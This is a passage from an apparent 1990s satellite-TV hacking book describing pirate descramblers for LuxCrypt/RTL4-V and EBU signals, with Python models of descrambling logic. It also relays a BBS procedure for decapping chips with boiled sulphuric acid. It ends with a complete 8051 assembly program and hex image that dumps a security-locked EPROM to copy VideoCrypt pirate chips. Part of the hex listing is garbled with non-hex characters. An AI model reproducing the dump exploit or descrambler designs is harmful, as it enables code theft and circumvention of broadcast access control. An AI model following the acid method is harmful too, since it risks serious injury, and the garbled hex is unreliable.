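def scramble(line, delay_units, filler=BLACK):
    """Delay the active video by 0, 1 or 2 units.  The samples vacated at
    the left carry `filler`: black in the original system, a non-black
    level once the countermeasure was introduced.  Video pushed past the
    end of the line is lost, as it would be in a real delay line."""
    shift = delay_units * UNIT
    return line[:ACTIVE_START] + [filler] * shift + line[ACTIVE_START:LINE - shift]


def sample_black(line):
    """Back porch sample: the sandcastle-gated sample and hold."""
    return line[ACTIVE_START - 10]


def detect_delay(line):
    """Radio Plans method: the first sample after the blanking that rises
    RISE_THRESHOLD above the sampled black level is the start of video,
    and its distance from the nominal start gives the delay in units."""
    black = sample_black(line)
    for i in range(ACTIVE_START, ACTIVE_START + 3 * UNIT):
        if line[i] - black > RISE_THRESHOLD:
            return min((i - ACTIVE_START) // UNIT, 2)
    return 0


def add_delay(line, units):
    """Insert `units` of black at the start of the active video; the synch
    and burst section is gated straight through, as the flipflop reset
    ensures in the hardware."""
    shift = units * UNIT
    return line[:ACTIVE_START] + [BLACK] * shift + line[ACTIVE_START:LINE - shift]


def descramble(line):
    """Radio Plans: add the complement so every line carries 2 units."""
    return add_delay(line, 2 - detect_delay(line))


def descramble_keyed(line, delay_units):
    """J Card style: the delay is known from transmitted data, so no rise
    detection is needed and the filler level is irrelevant."""
    return add_delay(line, 2 - delay_units)


def aligned(descrambled, clear):
    """A correct result equals the clear line delayed by 2 units everywhere
    beyond the 2 unit band at the left (the band lost in overscan)."""
    start = ACTIVE_START + 2 * UNIT
    return descrambled[start:] == add_delay(clear, 2)[start:]


def run(filler=BLACK, keyed=False, n_lines=30, seed=1):
    """Scramble n_lines with random delays and check the picture lines up."""
    rnd = random.Random(seed)
    for k in range(n_lines):
        clear = make_line(k)
        d = rnd.choice([0, 1, 2])
        scrambled = scramble(clear, d, filler)
        out = descramble_keyed(scrambled, d) if keyed else descramble(scrambled)
        if not aligned(out, clear):
            return False
    return True
```

run() with black filler lines up every line; run(filler=0.3) shows the 
countermeasure, since the grey filler is itself a rise above black and 
every line is read as undelayed; run(filler=0.3, keyed=True) shows why the 
J Card approach survives it. 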


The descrambler can be considered in two sections, the video strip and the 
microcontroller section. 


The Video Strip 


The input section of the video strip is a two transistor design. A FET 
used as a voltage controlled resistor provides automatic gain control. This 
is essential for the data and synch stripping. The AGC is applied to the input 
of the video amplifier. The output of this amplifier is buffered and fed to the 
delay lines. 


Three video signals are necessary to descramble the signal; an undelayed 
video signal, a one delay video signal and a two delay video signal. In order 
to maintain a constant amplitude among the signals, two presets are 
included in the 0 delay and the 2 delay chains. A single terminating resistor 
is included on the 1 delay chain. The switching between the video signals is 
effected by three 4066 switches. The output of each of these switches is fed 
to one of the inputs on a 4052 multiplexer. 


The 4052 controls the switching between synch and video signals. The 
descrambled video is fed to a two stage transistor buffer. The video output 
is taken from a 1K0 preset on the emitter of the second transistor. 


The Microcontroller Section 


The microcontroller used in this design is the 68705. This is a secured 
EPROM version. Should an upgrade be necessary, Hi-Tech can easily 
issue a replacement. The crystal frequency is 4.0 MHz. 


The control signals are extracted from the video by a divider and 
comparator network. The topmost comparator strips the data from the video 
signal. This is fed to the microcontroller. 


The second comparator is the AGC comparator. This triggers the 4538 
monostable. The monostable creates a 1 uS window in which to sample the 
blanking level. A gated comparator samples the signal and the output is 
integrated and fed to the TL081 AGC amplifier. In this way the amplitude of 
the video signal is kept constant. This is an essential requirement for this 
type of decoder as the divider - comparator chain will not operate properly if 
the voltages are off spec. 


The third comparator is the synch stripper. This provides a synch train to 
the microcontroller so that the correct lines can be selected for data 
extraction. 


The microcontroller supplies the switching control signals to the 4052 
multiplexer. These control signals combine the proper synch signals with 
the descrambled video. 


A lock detect circuit is operated by the microcontroller. This circuit will send 
a descrambler select signal to the SCART control circuitry. 
EBU Resyncher 


Some readers of previous versions have expressed an interest in receiving 
signals that have the synchs corrupted either intentionally, as is the case 
with EBU sound in synch, or accidentally as is the case with poor CNR. 


In the past, descramblers like the PDS synch generator have been used to 
lock up these signals for display. While we do not have the circuit diagram 
of the PDS synch generator, we do have a somewhat cheaper alternative. 


The EBU format system is designed to optimise the satellite power. On a 
normal satellite transmission, the audio is transmitted on a subcarrier in the 
range 5 MHz to 8 MHz. This consumes some of the available power. The 
EBU system economises by putting the audio in the video waveform. This 
means that the EBU transmission format is essentially only a video 
waveform. As a result, the power that would have been used for an audio 
subcarrier can now be used for the video. This gives a better CNR. 


The EBU sound in synch system is essentially a PAL 625 signal with pulse 
coded modulation, (PCM), data inserted into the horizontal synch section. 
The PCM data tends to confuse the synch stripping circuitry of some 
monitors and televisions. This is due to the continually changing nature of 
the data. The synch detector is expecting a nice clean pulse. Instead it 
receives a glitchy set of pulses. Some of the televisions and monitors that 
use edge detection should not have any problems. 


Recovering the video on this system merely involves replacing the 
horizontal synch pulse area in the scrambled signal with a new properly 
timed horizontal synch pulse. The following is a design idea rather than a 
complete circuit. The circuit elements have been tested and used in other 
descramblers. 


Circuit Description 


A number of circuit elements are required for this operation. The first is a 
synch stripper. The comparator type given in chapter three is used for this. 


The second circuit element is a monostable. This produces the necessary 
timing pulse to switch out the digital data and reinsert a flat level for the 
synch tip. 


The third section is the video section. This section is somewhat more 
complex than the previous elements though it has been simplified as much 
as possible. The input signal to the video section is unclamped video. The 
video must be clamped for proper processing. The circuit used for this is a 
typical satellite television receiver circuit. The voltage rating of the Zener is 
4V7. The clamped video is then fed to a double pole switch consisting of 
two 4066 gates. 


The function of the electronic switch is to allow the video to be gated 
through and the digital data to be replaced. The video switch is normally 
closed except for the period of the digital audio. The digital audio gate is 
normally open but is closed for the digital audio period. This gate is 
connected to a preset that sets the synch tip voltage. 


The outputs of the two gates are connected to a buffer transistor. The 
output of the transistor amplifier should be clamped video without the digital 
audio. It may be necessary to add a field pulse detector and some logic in 
order to stop the gating triggering on the field pulse section of the signal. 
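A software model of the design idea, added here as an example rather than 
taken from the text's circuit: a comparator synch stripper, a 
non-retriggerable monostable opening a 4.7 us window at each synch leading 
edge, a gate that replaces the window with a flat tip level, and the field 
pulse detector the last paragraph mentions, which inhibits the gate on any 
broad pulse. The sample grid, the levels, and the 0.5 us of clean tip at 
each end of the data burst are assumptions of the example. 

```python
"""EBU sound-in-synch resyncher modelled on a sample grid.  Added
example, not the book's circuit; grid, levels, widths and the shape of
the constructed test signal are assumptions."""
import random

SAMPLE_NS = 100         # assumed model grid: 10 samples per microsecond
LINE = 640              # samples per 64 us line
SYNCH_TIP = -0.3        # volts below blanking, PAL synch amplitude
SLICE_LEVEL = -0.15     # comparator threshold at half synch amplitude
TIP_WIDTH = 47          # 4.7 us line synch
FIELD_MIN_WIDTH = 200   # a low run of 20 us or more is a field pulse (assumed)


def synch_stripper(samples):
    """The comparator: True wherever the signal is below the slice level."""
    return [v < SLICE_LEVEL for v in samples]


def field_pulse_mask(stripped, min_width=FIELD_MIN_WIDTH):
    """Field pulse detector: marks every low run at least min_width long."""
    mask = [False] * len(stripped)
    i = 0
    while i < len(stripped):
        if not stripped[i]:
            i += 1
            continue
        j = i
        while j < len(stripped) and stripped[j]:
            j += 1
        if j - i >= min_width:
            for k in range(i, j):
                mask[k] = True
        i = j
    return mask


def monostable(stripped, width, inhibit):
    """Non-retriggerable window of `width` samples from each falling edge
    of the stripped synch, unless the edge lies in an inhibited region.
    The PCM glitches inside the tip fall within the window and are ignored."""
    gate = [False] * len(stripped)
    i = 0
    while i < len(stripped):
        falling = stripped[i] and (i == 0 or not stripped[i - 1])
        if falling and not inhibit[i]:
            for j in range(i, min(i + width, len(stripped))):
                gate[j] = True
            i += width
        else:
            i += 1
    return gate


def gate_for(samples, detect_field=True):
    """The gating waveform, with or without the field pulse detector."""
    stripped = synch_stripper(samples)
    inhibit = field_pulse_mask(stripped) if detect_field else [False] * len(stripped)
    return monostable(stripped, TIP_WIDTH, inhibit)


def resync(samples, tip_level=SYNCH_TIP, detect_field=True):
    """Replace the data-filled synch tip of every line with the flat level
    set by the preset; leave everything else, field pulses included, alone."""
    gate = gate_for(samples, detect_field)
    return [tip_level if g else v for v, g in zip(samples, gate)]


def constructed_line(bits):
    """One line whose synch tip carries PCM bits: 0.5 us of clean tip at
    each end (assumed), a '1' bit at -0.05 V inside the tip, blanking to
    12 us, then a flat grey picture.  Constructed test data."""
    tip = [SYNCH_TIP] * 5 + [-0.05 if b else SYNCH_TIP for b in bits] + [SYNCH_TIP] * 5
    return tip + [0.0] * (120 - len(tip)) + [0.3] * (LINE - 120)


def constructed_signal(n_lines=5, seed=3):
    """A data line, then a broad 27 us field pulse, then n_lines more lines."""
    rnd = random.Random(seed)
    bits = lambda: [rnd.random() < 0.5 for _ in range(TIP_WIDTH - 10)]
    sig = constructed_line(bits())
    sig += [SYNCH_TIP] * 270 + [0.0] * (LINE - 270)
    for _ in range(n_lines):
        sig += constructed_line(bits())
    return sig
```

Without the field detector the monostable fires on the leading edge of the 
broad pulse as well; with it, the gate stays shut for the whole field 
pulse and only the line tips are rewritten. 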


Case Study: LuxCrypt 


The IRDETO system was patented in 1982. It was the forerunner of the 
OAK ORION system. From studying the patent, it would appear that the 
most daunting aspect of the system is the digital audio. The scrambling 
system used by RTL4-V is known as LuxCrypt and is a subset of the 
IRDETO system. 


The basic strength of the system is that it relies on the replacement of synch 
pulses to scramble the video. Since there are no synch pulses in the 
scrambled video signal, the television receiver cannot lock the picture. The 
old synch generator descramblers such as the Digisync and the PDS Synch 
Generator could lock the scrambled IRDETO signal in its present format. 


The main strength of the LuxCrypt subset is the active video inversion. A 
number of types of video inversion are allowed for in the specification. The 
type used in the January 1990 upgrade was Average Picture Level, (APL, 
pronounced apple). This type of inversion inverts the video polarity if the 
amount of white or black in a scene exceeds a preset threshold. The 
shortest time between inversions is three seconds. 


Many of the present pirate descramblers on the market detect the polarity of 
the video at the start of each field. This is not the best method. 


There is a polarity key in each line. Some pirates disagree with this view 
claiming that the polarity key is actually an artifact or glitch left over from the 
scrambling process. 


From observation, it appears that it is a polarity key. The official descram- 
bler is a low cost unit and as such it would need some facility for 
re-establishing the black level in the scrambled video. This polarity bit would 
provide such a facility. 
The colour burst does not change in time relative to the other components 
in the video signal. It is therefore a usable reference. The basic idea is to 
detect the colour burst using a tuned circuit and use it to synch a phase 
locked loop such as the 4046 or the TBA920. The SRP1000 design 
(FilmNet descrambler in Version 3) could probably be adapted for use by 
using a peak detector or comparator on the output of the tuned circuit. The 
output of the tuned circuit reaches its maximum at the end of the colour 
burst. 


The field synch can be recreated by counting the number of colour bursts 
and triggering a set of monostables. The first monostable would be used to 
position the field pulse. 


The procedure for determining the video polarity can be broken into three 
steps. 

1. The Colour burst is detected and used as the timing reference. 

2. The Burst, (Blanking level), is sampled. 

3. The polarity key is sampled. 


If the burst level is higher than the polarity key level then the video polarity is 
normal. 


If the burst level is lower than the polarity key then the video polarity is 
inverse. 


If the burst level is equal to the polarity key then the signal is not scrambled. 
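Added example, not from any descrambler on the page: the three cases above 
as a per-line decision with a tolerance for noise, a majority over the 
lines of a field (the reason the text prefers the per-line key to a once 
per field sample), and a hold-off that rejects any apparent inversion 
arriving sooner than the three second minimum spacing. The voltage levels, 
the tolerance and the field length are assumptions. 

```python
"""LuxCrypt polarity decision from the burst (blanking) sample and the
polarity key sample.  Added example; levels, tolerance and field length
are assumptions, the three cases and the 3 s rule are from the text."""

NORMAL, INVERSE, CLEAR = "normal", "inverse", "clear"
FIELDS_PER_SECOND = 50
MIN_HOLD_FIELDS = 3 * FIELDS_PER_SECOND   # no two inversions closer than 3 s


def line_polarity(burst_level, key_level, tolerance=0.05):
    """The three cases from the text, with a tolerance (assumed, volts) so
    that noise on two nominally equal samples still reads as clear."""
    diff = burst_level - key_level
    if abs(diff) <= tolerance:
        return CLEAR
    return NORMAL if diff > 0 else INVERSE


def field_polarity(samples, tolerance=0.05, min_agreement=0.6):
    """Majority over the (burst, key) sample pairs of one field.  Returns
    None when no verdict reaches min_agreement of the lines."""
    votes = {NORMAL: 0, INVERSE: 0, CLEAR: 0}
    for burst, key in samples:
        votes[line_polarity(burst, key, tolerance)] += 1
    total = sum(votes.values())
    if total == 0:
        return None
    verdict, count = max(votes.items(), key=lambda kv: kv[1])
    return verdict if count / total >= min_agreement else None


class PolarityTracker:
    """Field-to-field state.  A change between normal and inverse sooner
    than MIN_HOLD_FIELDS after the last accepted change cannot be a real
    inversion, so it is ignored rather than flipping the output video.
    Changes to or from clear are not inversions and are accepted at once."""

    def __init__(self):
        self.current = None
        self.fields_since_change = MIN_HOLD_FIELDS

    def update(self, field_samples):
        self.fields_since_change += 1
        verdict = field_polarity(field_samples)
        if verdict is None or verdict == self.current:
            return self.current
        inversion = CLEAR not in (verdict, self.current)
        if (self.current is None or not inversion
                or self.fields_since_change >= MIN_HOLD_FIELDS):
            self.current = verdict
            self.fields_since_change = 0
        return self.current


def select_video(line, verdict, white=0.7):
    """The 4066 polarity switches: pass the line as is, or take the
    inverted path (video mirrored within the 0 to white range)."""
    if verdict == INVERSE:
        return [white - v for v in line]
    return list(line)


def constructed_field(burst, key, glitched_lines=0, n_lines=287):
    """Constructed sample pairs for one field: every line reads (burst,
    key) except glitched_lines, which read the opposite way round."""
    return [(burst, key)] * (n_lines - glitched_lines) + [(key, burst)] * glitched_lines


def verdict_after(n_inverse_fields):
    """Start on a normal field, feed n inverse fields, return the output."""
    tracker = PolarityTracker()
    out = tracker.update(constructed_field(0.3, 0.1))
    for _ in range(n_inverse_fields):
        out = tracker.update(constructed_field(0.1, 0.3))
    return out
```

The hold-off is the one place where a property of the scrambler, the 
three second minimum between inversions, is turned against it: a glitch 
that looks like an inversion for a field or two is simply not believed. 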


The 2 MHz PLL used in the PLL FilmNet design could be adapted for use in 
this application. The main change would be in the horizontal blanking 
decoding on the output of the counter. A comparator would be used to 
detect the colour burst peak. A sampling gate circuit such as that used in 
the SRP1000 design would eliminate some of the false triggering. 


On Astra 1-C, RTL-5 is now using what appears to be a version of the 
LuxCrypt system. Some of the old pirate descramblers will not lock up on 
the signal, perhaps indicating that the system may be employing APL 
inversion. 


Hi-Tech Galaxy RTL4V Stand Alone Descrambler 


This is a stand alone descrambler for the LuxCrypt system as used on the 
RTL-4 channel. The system as implemented on Luxcrypt is a minimal 
system. It is a derivative of the IRDETO system. The audio scrambling 
facility, IRDETO's most powerful aspect, is not used. 



The main attraction of RTL-4V is that many of the terrestrial television 
sit-coms and serials are shown. Unfortunately, they are scrambled as 
RTL4-V only buys the local rights. The Luxcrypt system is a token 
scrambling system in that it is not really meant to offer any serious 
protection. 


The stand alone RTL4-V descrambler is a PLL based design. It is 
essentially three sections; the video input strip, the PLL and the video output 
strip. 


The Video Input Strip 


The first part of the video input strip uses two discrete transistor amplifiers 
to amplify the baseband input. The input level of the second amplifier is 
controlled by a 500R preset on the output of the first amplifier. 


The second amplifier feeds a video bandpass filter. The output of the filter is 
buffered and fed to an inverting and non inverting buffer. These provide the 
necessary normal and inverted video signals necessary for descrambling 
the signal. 


The PLL 


The VCXO of the phase locked loop is constructed around a 5.752 MHz 
crystal. Two gates of a 74HC04 hex inverter are used. The phase 
comparator is a switched type. The switch is a 4066 gate and this switches 
between the oscillator output, CLK5M7, and the sampled clock signal. 


The horizontal and vertical timing are generated by different sections of 
logic. The field timing is used to trigger the horizontal timing section 
constructed around the 27256 EPROM and also to trigger the decoder 
select control. 


The core of the descrambler is the 27256 EPROM. The PLL clocks two 
counters which control the addressing on the EPROM. By using a series of 
counters and combinational logic on the EPROM outputs, it is possible to 
generate the sample and control slots necessary to descramble the signal. 
This is an elegant solution to the problem. 


The Video Output Strip 


The video output stage owes much to the Oak ORION design published in 
the Pink And Brown book. It uses 4066 switches to effect the clock 
sampling and the clamping. 
RTL4-V Descrambler Block Diagram 


The clamping is necessary to restore the synch pulses and blanking in the 
descrambled video. The main switching for this operation is performed by a 
4051. The video output is buffered and then fed to the output. 


The connectors on this descrambler are the same as those on the other 
Galaxy type descramblers, two SCART connectors and two phono connec- 
tors. The loopthrough and switching is controlled by the PLL logic. A relay is 
also used in this design. 


The Power Supply 


The power supply uses a 15 Volt transformer feeding a bridge rectifier. A 1 
Amp fuse is included prior to the bridge rectifier. An LED indicates that 
power is present. 


Two IC regulators are used to produce the +12 Volts and +6 Volts supply 
lines. Each has its own reservoir capacitor and separate decoupling 
capacitors. 


Popping Secured Microcontrollers 


The removal of security is one of the by-products of a hack. It is often more 
a hardware issue than a software issue. This is due mainly to the fact that 
the device under examination is usually a microcontroller. 


The term used for the process of removing the security is "popping". The 
origin comes from electronic repair work. When a unit has to be repaired, 
the case or cover has to be removed. Hence you pop the top. The basic 
techniques for getting access to the silicon die of the chip involves popping 
the top of the chip. 


While software techniques do exist, the fastest and often most dangerous 
techniques are based on removal of the material surrounding the silicon 
chip itself. The best way to do this is using strong acid, usually Sulphuric or 
Nitric. It is however an extremely dangerous procedure that requires proper 
facilities and precautions. 


Some details posted on BBSes and the internet referred to boiling battery 
acid to obtain a purer form of sulphuric acid for the process. However 
boiling acid is extremely dangerous and it does tend to create fumes. The 
fumes are often toxic. In the case of sulphuric or nitric acids these fumes 
can kill you. The vapours from strong solutions of nitric acid irritate the 
respiratory system and can burn the skin and eyes. At the worst, a few 
lungfuls of these concentrated vapours can result in a very unpleasant 
death. 
The fumes have to be vented away from the operating areas. In a properly 
equipped laboratory, such work is possible using a fume cupboard. It is not 
exactly a kitchen table hack. 


The technique of boiling sulphuric acid to derive a stronger, more 
concentrated form of the acid is to say the least an extremely dangerous 
operation. The document posted on the BBSes suggested boiling the acid in 
a pyrex container until white clouds of sulphur dioxide were given off. It is 
this gas that has to be vented off. 


The procedure referred to drilling a hole in a PIC16C57 until the silicon die 
was just visible. Then with a hypodermic syringe a small amount of 
concentrated sulphuric acid was placed in the hole. This acid was left for a 
few minutes to dissolve the remaining material over the silicon die. Then the 
chip was flushed with acetone to remove and neutralise the acid. Apparently 
after this it was possible to reset the fuses on the chip by shining a UV 
eraser on the area from a distance of roughly five inches away. 


In many cases, the removal of the material surrounding the silicon die is not 
necessary. Indeed there are some very nice little hacks that can be used to 
get access to the secured ROM, EPROM or EEPROM using non-standard 
voltages and/or non-standard timing. 


Over the last few years the claims of security made for certain chips have 
been, to say the least, destroyed. As the industry progresses, there is a 
constant battle to secure the hacks both against the channels and against 
other hackers and pirates. The results have, in some cases, been 
catastrophic. The best illustration of this was the release of the information 
on popping the PIC16C84. 


The techniques of popping chips became important when the descrambler 
designs for the analogue systems, FilmNet, Teleclub and RTL-V, started to 
include microcontrollers. The commonest microcontroller was the 8051 and 
its EPROM version, the 8751. Naturally the descrambler manufacturers 
were worried about the possibility that other manufacturers would copy the 
code. Therefore they used the One Time Programmable (OTP) versions. 
Naturally there were ways around the problem but since most of the 
systems were fairly primitive, the descramblers remained predominantly 
analogue. It was not until 1993 that the methods of popping these 
microcontrollers took on a new significance. 


In early 1993, the first Ho Lee Fook chips started to appear. Initially, these 
chips were intended to replace the 8052 in the official VideoCrypt decoder 
thus creating the Cardless VideoCrypt decoder. They were based on the 
8752 and 8751 microcontrollers. 


3-58 


3: Descrambler Building Blocks 


Hacking The 8752/8751 Futuretron Chips 


This is one of the original programs, in assembler, for hacking the 
Futuretron chips. The Futuretron hack on VideoCrypt issue 07 was based 
on the 8752 and later the 8751. The version used was the One Time 
Programmable version. The only difference between the OTP version of the 
chip and the EPROM version is that the EPROM version has a quartz glass 
window to allow the chip to be erased and reprogrammed. 


Of course it was possible to physically remove the top of the chip and reset 
the fuses using the conventional techniques. But there was a simpler and 
less messy method of extracting the data from the chip's secured EPROM. 


This hack exploited the MOVC A,@A+DPTR instruction, the 8051's code 
memory read, to spoof the microcontroller into switching momentarily to 
external EPROM, reading a routine, switching back to the internal EPROM 
and executing the routine. The routine dumped the contents of the secured 
EPROM out of the serial port. 


The hack operates in the following manner: 


1. The microcontroller is booted up with the internal EPROM on. 


2. When the microcontroller is running the internal EPROM, the EA pin is 
   switched to select external EPROM. 


3. The microcontroller then reads the routine from EPROM at 2000h and 
   dumps the contents of the secured EPROM out of the serial port. 


4. A PC running a terminal program logs the output of the serial port. 


The hack makes use of an 8051/8052 development board. The program, 
HACK.ASM, is assembled and loaded into an EPROM (the hex listing for the 
program is also included here). The EPROM and the chip to be read are 
placed in the development board and the unit is powered up. The terminal 
program then captures the secured EPROM contents to a log which can be 
saved and disassembled later. The serial port runs at 9600 baud: with timer 1 
in 8-bit auto-reload mode, TH1 = 0FDH and SMOD = 0, an 11.0592 MHz 
crystal gives 11059200 / (12 x 32 x 3) = 9600, which is why the listing 
insists on that crystal. 


Other similar hacks exist for different microcontroller families. Indeed one of 
the more popular hacks of the late eighties and early nineties was that for 
the 68705 which may have been based along similar lines. 
;**********************************************************************
; THIS SOURCECODE HACKS 8052 MICROCONTROLLERS WITH ITS TWO
; SECURITY BITS SET. THE SOURCE IS MADE TO GET THE CODE OF
; VIDEOCRYPT CLOWN CHIPS. YOU CAN USE THIS SOFTWARE ON ANY
; 8051 EVALUATION BOARD AND THE HACK IS DONE BY SWITCHING FROM
; INTERNAL TO EXTERNAL PROGRAM MEMORY. WHAT YOU NEED IS A
; TERMINAL PROGRAM WITH CAPTURE ON, SERIAL DATA IS COMING OUT
; FROM THE TXD PIN ON THE MICROCONTROLLER, GOOD LUCK!!!
;
; NOTE: PLEASE USE A 11.0592 MHZ X-TAL
;**********************************************************************

        CSEG AT 0
BEGIN:  CALL    RS_INIT
        MOV     DPTR,#TEKST1
        CALL    RS_DPTR
        SJMP    $

        CSEG AT 2000H
        CALL    RS_INIT
        MOV     DPTR,#TEKST2
        CALL    RS_DPTR
        MOV     DPTR,#LOGO
        CALL    RS_DPTR
        MOV     A,#32
        CALL    DELAY
        MOV     DPTR,#0000H
        CALL    GETTER
        MOV     DPTR,#TEKST3
        CALL    RS_DPTR
        MOV     A,#32
        CALL    DELAY
        MOV     DPTR,#0000H
LOOP:   CALL    GETTER
        MOV     B,A
        MOV     A,DPH
        CALL    RS_HEX
        MOV     A,DPL
        CALL    RS_HEX
        MOV     A,#':'
        CALL    RS_ASC
        MOV     A,B
        CALL    RS_HEX
        CALL    RS_CR
        INC     DPTR
        MOV     A,DPH
        CJNE    A,#20H,LOOP
        MOV     DPH,#0
        SJMP    LOOP

GETTER: PUSH    DPH
        PUSH    DPL
        MOV     R2,#1
        MOV     R0,#0
        CLR     A
        MOV     @R0,A
;**********************************************************************
; TRAP ADDRESS, PLEASE TRY ONE OF THESE
;**********************************************************************
        CALL    016B1H          ; OR 012DAH OR 017ACH
        POP     DPL
        POP     DPH
        RET

;**********************************************************************
; BEGIN MODULE RS-232
;**********************************************************************
RS_INIT:
        MOV     TMOD,#20H
        MOV     TH1,#0FDH       ; SETS THE BAUD RATE
        MOV     TCON,#040H
        MOV     SCON,#058H
        MOV     87H,#000H       ; 87H IS PCON: 80H DOUBLES THE BAUD RATE, 00H DOES NOT
        SETB    P3.1
        MOV     A,#1
        CALL    DELAY           ; LET THE RS-232 LINE SETTLE
        CLR     TI
        RET

RS_CR:  PUSH    ACC
        MOV     A,#0AH
        CALL    RS_ASC
        MOV     A,#0DH
        CALL    RS_ASC
        POP     ACC
        RET

RS_DPTR:
        CLR     A
        MOVC    A,@A+DPTR
        CJNE    A,#'~',RS_DPTR_1
        RET
RS_DPTR_1:
        CJNE    A,#'`',RS_DPTR_2
        CALL    RS_CR
        INC     DPTR
        SJMP    RS_DPTR
RS_DPTR_2:
        CALL    RS_ASC
        INC     DPTR
        SJMP    RS_DPTR

RS_ASC: MOV     SBUF,A
        JNB     TI,$
        CLR     TI
        RET

RS_HEX: PUSH    DPH
        PUSH    DPL
        PUSH    ACC
        MOV     DPTR,#HEXTABEL
        SWAP    A
        ANL     A,#00FH
        MOVC    A,@A+DPTR
        CALL    RS_ASC
        POP     ACC
        PUSH    ACC
        ANL     A,#00FH
        MOVC    A,@A+DPTR
        CALL    RS_ASC
        POP     ACC
        POP     DPL
        POP     DPH
        RET

HEXTABEL:
        DB      '0123456789ABCDEF'

RS_DEC: PUSH    ACC
        PUSH    B
        MOV     B,#100
        DIV     AB
        ADD     A,#30H
        CALL    RS_ASC
        MOV     A,B
        MOV     B,#10
        DIV     AB
        ADD     A,#30H
        CALL    RS_ASC
        MOV     A,B
        ADD     A,#30H
        CALL    RS_ASC
        POP     B
        POP     ACC
        RET

TEKST1: DB      'GOOD LUCK```````````````````'
        DB      '*******************************************`'
        DB      '*   VIDEOCRYPT CHIP COPIER VERSION 2.02   *`'
        DB      '*******************************************``'
        DB      '1. SWITCH TO INTERNAL ROM`'
        DB      '2. RESET CHIP`'
        DB      '3. SWITCH BACK TO EXTERNAL ROM`'
        DB      '4. WAIT FOR THE MESSAGE READY TO COPY`'
        DB      '5. SWITCH BACK TO INTERNAL ROM``'
TEKST2: DB      '``````````READY TO COPY`SWITCH TO INTERNAL ROM`~'
TEKST3: DB      '``````````HEY LOW FUCK.... HERE IT COMES....`'
        DB      'AND ENJOY YOUR COPIES OF A SKY-CLOW(N)`'
LOGO:   DB      '                                           `'
        DB      '                                           `'
        DB      '              OOOOOOOOOO                  `'
        DB      '           OOOO          OOOO               `'
        DB      '        OO                  OO             `'
        DB      '       O                      O            `'
        DB      '      O     SSSS K   K Y   Y   O           `'
        DB      '     O     S     K  K  Y   Y    O          `'
        DB      '     O      SSS  KKK    Y Y     O          `'
        DB      '     O         S K  K    Y      O          `'
        DB      '      O    SSSS  K   K   Y     O           `'
        DB      '       O                      O            `'
        DB      '        OO                  OO             `'
        DB      '          OOOO          OOOO               `'
        DB      '              OOOOOOOOOO                  `'
        DB      '                                            `'
        DB      '            MULTY-CHANNELS                 `'
        DB      '                                           `~'

DELAY:  PUSH    050H
        PUSH    051H
        PUSH    052H
        MOV     50H,A
        MOV     51H,#00H
        MOV     52H,#00H
DELAY_2:
        DJNZ    52H,DELAY_2
        DJNZ    51H,DELAY_2
        DJNZ    50H,DELAY_2
        POP     052H
        POP     051H
        POP     050H
        RET

        END


EPROM Image Of HACK. ASM 


:0В0000001220619020Ғ512208980ҒЕ84 

:102000001220619022231220899022A71220897425 
:10201000201225C090000012204F902253122089D8 
:1020200074201225C090000012204FF5F0E58312B5 
:1020300020A5E5821220A5743A12209DE5F0122019 
:10204000A512207AA3E583B420DE75830080D9C071 
:1020500083C0827A017800E4F61216B1D082D08370 
:1020600022758920758DFD75884075985875870093 
:10207000D2B174011225C0C29922C0E0740A1220A4 
:102080009D740D12209DD0E022E493B47E0122B411 
:102090006005117AA380F212209DA380ECF599309F 
:1020A00099FDC29922C083C082C0E09020C4C4546C 
:1020B0000F93119DD0E0C0E0540F93119DD0E0D05C 
:1020C00082D0832230313233343536373839414289 
:1020D00043444546C0E0C0F075F064842430119D4F 
:1020E000E5F075F00A842430119DE5F02430119D4F 
:1020F000D0F0D0E022474F4F44204C55434B606016 
:1021000060606060606060606060606060606060CF 
:10211000602A2A2A2A2A2A2A2A2A2A2A2A2A2A2AE9 
:102120002A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A0F 
:102130002A2A2A2A2A2A2A2A2A2A2A2A602A2020DD 
:1021400020564944454F4352595054204348495022 
:1021500020434F504945522056455253494F4E2037 
:10216000322E30322020202A602A2A2A2A2A2A2A9D 
:102170002A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2ABF 
:102180002A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2AAF 
:102190002A2A2A2A6060312E205357495443482066 
:1021A000544F20494E5445524E414C20524F4D60A1 
:1021B000322E205245534554204348495060332E17 
:1021C00020535749544348204241434B20544F2009 
:1021D00045585445524E414C20524F4D60342E20AC 
:1021E0005741495420464F5220544845204D4553AD 
:1021F0005341474520524541445920544F20434FB5 
:10220000505960352E20535749544348204241438A 
:102210004B20544F20494E5445524E414C20524F72 
:102220004D60606060606060606060606052454109 
:10223000445920544F20434F5059605357495443F9 
:102240004820544F20494E5445524E414C20524F45 
:102250004D607E60606060606060606060484559AD 
:10226000204C4F5720465543482E2E2E2E20484594 
:10227000524520495420434F4D45532E2E2E2E605B 
:10228000414E4420454E4A4F5920594F5552204304 
:102290004F50494553204F46204120534B592D4321 
:1022A0004C4F57284E29602020202020202020201D 
:1022B000202020202020202020202020202020201E 
:1022C000202020202020202020202020202020200E 
:1022D00020206020202020202020202020202020BE 
:1022E00020202020202020202020202020202020EE 
:1022F000202020202020202020202020202060209E 
:10230000202020202020202020202020204F4F4F40 
:102310004F4F4F4F4F4F4F20202020202020202074 
:10232000202020202020202020206020202020206D 
:1023300020202020204F4F4F4F20202020202020E1 
:102340002020204F4F4F4F202020202020202020D1 
:102350002020202020206020202020202020204F0E 
:102360004F2020202020202020202020202020203E 
:102370002020204F4F2020202020202020202020FF 
:10238000202060202020202020204F2020202020DE 
:10239000202020202020202020202020202020203D 
:1023A000204F2020202020202020202020206020BE 
:1023B00020202020204F2020202020535353532022 
:1023C0004B2020204B2059202020592020204F2016 
:1023D00020202020202020202020602020202020BD 
:1023E0004F20202020205320202020204B20204B35 
:1023F00020205920202059202020204F202020203C 
:102400002020202020206020202020204F2020205D 
:1024100020202053535320204B4B4B202020205969 
:10242000205920202020204F202020202020202044 
:1024300020206020202020204F202020202020202D 
:10244000202053204B20204B2020202059202020CA 
:102450002020204F2020202020202020202060200D 
:1024600020202020204F2020202053535353202071 
:102470004B2020204B2020205920202020204F209E 
:10248000202020202020202020206020202020200C 
:1024900020204F202020202020202020202020200D 
:1024A0002020202020202020204F202020202020FD 
:1024B0002020202020206020202020202020204FAD 
:1024C0004F202020202020202020202020202020DD 
:1024D0002020204F4F20202020202020202020209E 
:1024E000202060202020202020202020204F4F4F1F 
:1024F0004F202020202020202020204F4F4F4F20F1 
:10250000202020202020202020202020202060208B 
:10251000202020202020202020202020204F4F4F2E 
